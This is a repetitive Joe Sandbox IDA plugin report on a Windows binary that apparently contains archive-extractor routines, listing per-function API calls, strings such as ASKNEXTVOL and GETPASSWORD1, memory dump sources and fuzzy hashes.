Part of subcall function 000E7A9C: GetLastError.KERNEL32 ref: 000E7AF1
Part of subcall function 000E7A9C: CloseHandle.KERNEL32(?), ref: 000E7B00

Strings

SeRestorePrivilege, xrefs: 000E7460
SeSecurityPrivilege, xrefs: 000E744B

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: ErrorH_prologLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 3813983858-639343689
Opcode ID: dcd757ea00d78783346c73c9423e6d05b10f3f2d0feb3746665636e8695febe6
Instruction ID: aefa60120a8cb7e1fc4165d8ee85bf27cb9ced97f0fa8ef008f49ba0c5c9e0dc
Opcode Fuzzy Hash: dcd757ea00d78783346c73c9423e6d05b10f3f2d0feb3746665636e8695febe6
Instruction Fuzzy Hash: 2131F2B2D04288BEDF11EBA5DC45BEEBBB8AF59300F044015F509B7193C7708A84CB61

Uniqueness

Uniqueness Score: -1.00%

Function 000FAD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 000E1316: GetDlgItem.USER32(00000000,00003021), ref: 000E135A
Part of subcall function 000E1316: SetWindowTextW.USER32(00000000,001135F4), ref: 000E1370

EndDialog.USER32(?,00000001), ref: 000FAD98
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 000FADAD
SetDlgItemTextW.USER32(?,00000066,?), ref: 000FADC2

Strings

ASKNEXTVOL, xrefs: 000FAD28

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: d62bc222ca2aca02a3769eaa865b45cbf3a69f91c744fad31cd94c08e4cc2e60
Instruction ID: decec690e5eddd5a23f750159be433c88aa238bd055adc807d11323a84e29def
Opcode Fuzzy Hash: d62bc222ca2aca02a3769eaa865b45cbf3a69f91c744fad31cd94c08e4cc2e60
Instruction Fuzzy Hash: 08118472380204BFD7619F68EC45FBA77A9AB4B742F000110F346EBDB1C761A985A722

Uniqueness

Uniqueness Score: -1.00%

Function 000ED8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 000ED954
_strncpy.LIBCMT ref: 000ED99A

Part of subcall function 000F1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00121030,?,000ED928,00000000,?,00000050,00121030), ref: 000F1DC4

Strings

@%s, xrefs: 000ED93E
$%s, xrefs: 000ED949

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: ByteCharMultiWide__fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 562999700-834177443
Opcode ID: 96e56d494c3561048485e6fccdaba1155547392186f10cffafe3c6f4083f79f4
Instruction ID: fe0204cda61b9c3fbd8aede6463f3ce39c61e8f5def709e97881f1fe8d64474b
Opcode Fuzzy Hash: 96e56d494c3561048485e6fccdaba1155547392186f10cffafe3c6f4083f79f4
Instruction Fuzzy Hash: E121903244028CEEDB21EEA5CC41FEE7BE8EF05700F040122FA60A61A3E371D6588B51

Uniqueness

Uniqueness Score: -1.00%

Function 000F0E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,000EAC5A,00000008,?,00000000,?,000ED22D,?,00000000), ref: 000F0E85
CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,000EAC5A,00000008,?,00000000,?,000ED22D,?,00000000), ref: 000F0E8F
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,000EAC5A,00000008,?,00000000,?,000ED22D,?,00000000), ref: 000F0E9F

Strings

Thread pool initialization failed., xrefs: 000F0EB7

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: 28496ae513ef29f0ce095c853dabf032cfd7adb5fcb5860ad800d6648aaf95f3
Instruction ID: c875f808675ffeddc6acec2ba1b75f94044700faf2c22cef030055069c5ee1ed
Opcode Fuzzy Hash: 28496ae513ef29f0ce095c853dabf032cfd7adb5fcb5860ad800d6648aaf95f3
Instruction Fuzzy Hash: B41151B164070C9FC3315F669D849A7FBECEB69744F10882EF1DAC2601D67159809B64

Uniqueness

Uniqueness Score: -1.00%

Function 000FB270 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 000E1316: GetDlgItem.USER32(00000000,00003021), ref: 000E135A
Part of subcall function 000E1316: SetWindowTextW.USER32(00000000,001135F4), ref: 000E1370

EndDialog.USER32(?,00000001), ref: 000FB2BE
GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 000FB2D6
SetDlgItemTextW.USER32(?,00000067,?), ref: 000FB304

Strings

GETPASSWORD1, xrefs: 000FB289

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1
API String ID: 445417207-3292211884
Opcode ID: de38d3c7951ba1fa23c169fdc74fb353f74b66113cb14cca16354e2437346dd1
Instruction ID: 8432c633fd6c148bef9cf4835015883be5a3c7c0f9e14b93b4217eee5a35bdef
Opcode Fuzzy Hash: de38d3c7951ba1fa23c169fdc74fb353f74b66113cb14cca16354e2437346dd1
Instruction Fuzzy Hash: 1611A532A40119BADB619AB4DD49FFE376CEB5A754F100020FB45B38D0C7A09A45AB61

Uniqueness

Uniqueness Score: -1.00%

Function 000FDCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

REPLACEFILEDLG, xrefs: 000FDD1C, 000FDD50
RENAMEDLG, xrefs: 000FDD31

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: fa3fc929cb97725f40bca9c4df71b5ae9e5365bf9119cee4b777f1e6390243d8
Instruction ID: bf3c3f963900ea0848c294b1dbcf8f5b00d8379a95b0da33e288220283601935
Opcode Fuzzy Hash: fa3fc929cb97725f40bca9c4df71b5ae9e5365bf9119cee4b777f1e6390243d8
Instruction Fuzzy Hash: 2C015E76604289BFD761AF54FC44AAA7BEAF759354B000426FA0593E70C63198E1EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00109A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00109AA9
__alldvrm.LIBCMT ref: 00109CAA
__alldvrm.LIBCMT ref: 00109CCC

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
Instruction ID: b149951d571dd2988575c048113dc3243b3dd0027d4cc14ec53b28f2a77456ba
Opcode Fuzzy Hash: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
Instruction Fuzzy Hash: ADA12772E042869FEB25CF18C9A17AEBBE5EF55310F1841ADE5C59B2C3C3B88941C750

Uniqueness

Uniqueness Score: -1.00%

Function 000EA354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,000E7F69,?,?,?), ref: 000EA3FA
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,000E7F69,?), ref: 000EA43E
SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,000E7F69,?,?,?,?,?,?,?), ref: 000EA4BF
CloseHandle.KERNEL32(?,?,?,00000800,?,000E7F69,?,?,?,?,?,?,?,?,?,?), ref: 000EA4C6

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: 74a79aad50a915740926cdb32946f2de41a6fe1e4c29b59fa412d6343165809d
Instruction ID: 6b4bbd88169351ba783f1feb8f98e19bb2316c4384f68f80977e7be4ae0de469
Opcode Fuzzy Hash: 74a79aad50a915740926cdb32946f2de41a6fe1e4c29b59fa412d6343165809d
Instruction Fuzzy Hash: ED41CE712483C19ED731DF25DC45BEEBBE4AB8A300F04491DB5E0A71C1D6A4AB489B53

Uniqueness

Uniqueness Score: -1.00%

Function 000E1100 Relevance: 6.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 000E112B
_wcslen.LIBCMT ref: 000E1153
_wcslen.LIBCMT ref: 000E1182
_wcslen.LIBCMT ref: 000E11A9

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: 39c084d712e9b617ea9f06a069a8dcb8f41aa46ff83c4e7e07682ba2e65265d6
Instruction ID: e64d2dc09f60b2df3c3de365fe8d8a9b5666321dda8da82a8d41b0e02c9b759a
Opcode Fuzzy Hash: 39c084d712e9b617ea9f06a069a8dcb8f41aa46ff83c4e7e07682ba2e65265d6
Instruction Fuzzy Hash: 1441B47590066A9FCB219F68CC099EF7BBCEF11310F000129FA55F7256DB30AE558AA4

Uniqueness

Uniqueness Score: -1.00%

Function 0010C988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,2DE85006,001047C6,00000000,00000000,001057FB,?,001057FB,?,00000001,001047C6,2DE85006,00000001,001057FB,001057FB), ref: 0010C9D5
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0010CA5E
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0010CA70
__freea.LIBCMT ref: 0010CA79

Part of subcall function 00108E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00104286,?,0000015D,?,?,?,?,00105762,000000FF,00000000,?,?), ref: 00108E38

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 30d5f61583b4599ff078413a30bba29469796265293158c898961c28317a2ae8
Instruction ID: 88c24ff4ef4bb0382e289c12145a3f7fcc21c75e9555c8820084752538d2e435
Opcode Fuzzy Hash: 30d5f61583b4599ff078413a30bba29469796265293158c898961c28317a2ae8
Instruction Fuzzy Hash: E6319C72A0021AABDB28DF64CC45DEE7BA5EF41310B144228FC55E7290EB75CD90DBD0

Uniqueness

Uniqueness Score: -1.00%

Function 000FA663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 000FA666
GetDeviceCaps.GDI32(00000000,00000058), ref: 000FA675
GetDeviceCaps.GDI32(00000000,0000005A), ref: 000FA683
ReleaseDC.USER32(00000000,00000000), ref: 000FA691

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 65592dc02509434435c828b2eceee61ba12c0e458112e8c6f3fd065efaa75ccc
Instruction ID: 2fee68006d72b0417339c2ed3088440948eb62055eef401d81ee4136fc700c42
Opcode Fuzzy Hash: 65592dc02509434435c828b2eceee61ba12c0e458112e8c6f3fd065efaa75ccc
Instruction Fuzzy Hash: 93E01235A43721B7D3716B60BC1DB8B3E64AB17B52F014311FB15979F0DBB486818BA1

Uniqueness

Uniqueness Score: -1.00%

Function 000FA80C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 237COMMON

Download Yara Rule

APIs

Part of subcall function 000FA699: GetDC.USER32(00000000), ref: 000FA69D
Part of subcall function 000FA699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 000FA6A8
Part of subcall function 000FA699: ReleaseDC.USER32(00000000,00000000), ref: 000FA6B3

GetObjectW.GDI32(?,00000018,?), ref: 000FA83C

Part of subcall function 000FAAC9: GetDC.USER32(00000000), ref: 000FAAD2
Part of subcall function 000FAAC9: GetObjectW.GDI32(?,00000018,?), ref: 000FAB01
Part of subcall function 000FAAC9: ReleaseDC.USER32(00000000,?), ref: 000FAB99

Strings

(, xrefs: 000FA9AA

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: (
API String ID: 1061551593-3887548279
Opcode ID: 9a1ef533cc6a4b1191d40c3242400e8329014e660927cc6532525312d6b06e6b
Instruction ID: 5f39cccb5accb138662d75d3acc8d66c809355901fd26da6f2cf10f7a1774664
Opcode Fuzzy Hash: 9a1ef533cc6a4b1191d40c3242400e8329014e660927cc6532525312d6b06e6b
Instruction Fuzzy Hash: 7C9100B5608744AFD724DF25C844A6BBBE8FFC9700F00491EF59AD3660CB70A946CB62

Uniqueness

Uniqueness Score: -1.00%

Function 000E75DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 000E75E3

Part of subcall function 000F05DA: _wcslen.LIBCMT ref: 000F05E0

Part of subcall function 000EA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 000EA598

SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 000E777F

Part of subcall function 000EA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,000EA325,?,?,?,000EA175,?,00000001,00000000,?,?), ref: 000EA501
Part of subcall function 000EA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,000EA325,?,?,?,000EA175,?,00000001,00000000,?,?), ref: 000EA532

Strings

:, xrefs: 000E7654

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: File$Attributes$CloseFindH_prologTime_wcslen
String ID: :
API String ID: 3226429890-336475711
Opcode ID: fff399c627444e6c0a6aa3ef063d2215a31cb3689c459803c5f904a9e8ba02ea
Instruction ID: 05be4e07b439a30fed5b7f8273c23a768a8eb83d84a18ec843a77ccb3f4f8526
Opcode Fuzzy Hash: fff399c627444e6c0a6aa3ef063d2215a31cb3689c459803c5f904a9e8ba02ea
Instruction Fuzzy Hash: 97418071805598AEEB25EB61CC59EEEB7BCAF55300F004096B609B3093DB745F85DB60

Uniqueness

Uniqueness Score: -1.00%

Function 000FB48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 000FB4E3
_wcslen.LIBCMT ref: 000FB4FE

Strings

}, xrefs: 000FB4D6

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: _wcslen
String ID: }
API String ID: 176396367-4239843852
Opcode ID: bb74a0bf8d379bb2629df1ebf4b7c7b22051e48b243caebac33417ccdfa91edc
Instruction ID: cc470a22e3518a94af88ec8f50bd66db4fe90bdff5b87e6bf82f5a78ad052b4f
Opcode Fuzzy Hash: bb74a0bf8d379bb2629df1ebf4b7c7b22051e48b243caebac33417ccdfa91edc
Instruction Fuzzy Hash: 3221387290470E5AD730EA64D845FBBB3DCDF90B50F04042AF780C3541E7A9ED4897A2

Uniqueness

Uniqueness Score: -1.00%

Function 000EB991 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 000EB9B8

Part of subcall function 000E4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000E40A5

Strings

%c:\, xrefs: 000EB9AE

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 1543624204-3142399695
Opcode ID: de9056661f2ada98569f7952f6a2a38acee8e3beaaf89afc80a43585976ee196
Instruction ID: 406ac623e15bd06fdd65d11d215adacc90f58da3651ca93c890bf59aab053514
Opcode Fuzzy Hash: de9056661f2ada98569f7952f6a2a38acee8e3beaaf89afc80a43585976ee196
Instruction Fuzzy Hash: 460122731003516DDA716B6A8C46D7BB7ECEF91370F54442AF584E3082EB30D84082B2

Uniqueness

Uniqueness Score: -1.00%

Function 000E1316 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 000EE2E8: _swprintf.LIBCMT ref: 000EE30E
Part of subcall function 000EE2E8: _strlen.LIBCMT ref: 000EE32F
Part of subcall function 000EE2E8: SetDlgItemTextW.USER32(?,0011E274,?), ref: 000EE38F
Part of subcall function 000EE2E8: GetWindowRect.USER32(?,?), ref: 000EE3C9
Part of subcall function 000EE2E8: GetClientRect.USER32(?,?), ref: 000EE3D5

GetDlgItem.USER32(00000000,00003021), ref: 000E135A
SetWindowTextW.USER32(00000000,001135F4), ref: 000E1370

Strings

0, xrefs: 000E1319

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: 0
API String ID: 2622349952-4108050209
Opcode ID: a2b1ecdc0f05425fea013a1e5dd0813991ade05932349a66528fd68d6c6b561e
